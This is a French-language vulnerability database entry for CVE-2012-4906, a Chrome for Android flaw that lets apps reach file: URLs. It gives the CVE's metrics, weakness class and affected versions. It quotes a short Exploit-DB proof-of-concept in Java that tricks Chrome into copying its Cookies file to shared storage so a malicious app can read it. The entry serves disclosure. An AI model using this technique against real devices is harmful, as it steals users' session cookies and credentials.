CVE-2012-4906 : Détail

CVE-2012-4906

A01-Broken Access Control
0.16%V3
Network
2012-09-13
20h00 +00:00
2024-09-17
02h05 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Google Chrome before 18.0.1025308 on Android does not properly restrict access to file: URLs, which allows remote attackers to obtain sensitive information via unspecified vectors, as demonstrated by obtaining credential data, a different vulnerability than CVE-2012-4903.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 37793

Date de publication : 2012-09-11 22h00 +00:00
Auteur : Artem Chaykin
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible. Versions prior to Chrome for Android 18.0.1025308 are vulnerable. // This is a part of malicious Android app. public void attack() { try { // let Chrome app load its Cookies file, so that Chrome app // automatically save it to /sdcard/Download/ directory. Intent intent = new Intent("android.intent.action.VIEW"); intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main"); intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies")); startActivity(intent); // wait a few seconds Thread.sleep(3000); // read the Cookie file (/sdcard/Download/Cookies.bin) FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin"); ... }

Products Mentioned

Configuraton 0

Google>>Chrome >> Version To (including) 18.0.1025306

Google>>Android >> Version *

Références